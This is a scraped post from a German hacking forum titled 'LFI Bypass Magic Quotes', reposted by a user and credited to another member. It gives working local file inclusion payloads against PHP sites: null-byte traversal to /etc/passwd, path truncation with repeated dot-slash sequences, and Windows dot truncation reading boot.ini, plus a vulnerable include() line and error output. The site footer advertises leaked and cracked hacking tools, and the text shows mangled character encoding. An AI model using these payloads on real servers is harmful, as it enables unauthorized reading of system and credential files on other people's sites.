Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

LFI Bypass Magic Quotes

- - - - -

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
XoiL

XoiL

    Leecher

  • Banned
  • PIP
  • Likes
    2
  • 1 Beiträge
  • 14 Bedankt
  • Android [root], Blackberry
  • Linux
Hallo...
Ich share hier aus gegebenen Anlass mal etwas, wo ich bei denke das es dem einen oder anderen nützen kann.

Manchmal kommt man einfach nicht weiter bei einer LFI. Wenn Magic_quotes_gpc enabled sind kann man folgendes versuchen.

Normale LFI:
www.site.com/index?page=../../../../../../../../../etc/passwd%00

Dazu:
<?php include(?€™inc/?€™.$_GET['page'].?€™php?€™); ?>


Jedoch wird &00 zu /0 konvertiert und man sieht folgendes:
Warning: include(/../../../../../etc/passwd\0 [function.include]: failed to open stream: No such file or directory in /home/user/public_html/index.php


1-Path Truncation:


?page=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ ?€¦


?page=../../../../../../../../../etc/passwd./././././././././././?€¦

2-Dot Truncation:
Diese Methode funktioniert ausschlie??lich auf Windows Server (is klar). Wenn man also eine gro??e Anzahl an Punkten anfügt, wird kein Nullbyte benötigt.


page=../../../../../boot.ini?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦?€¦

Posted by Dr.Zydz DHHC! <3
Nicht von mir!

Lg
  • DR.zydz gefällt das



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 11 user(s)


    .:dodo:., Blackhook, Bypass, Ch!ller, Cube, Dean36, DR.zydz, juPP, LtoG, prto, XoiL
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.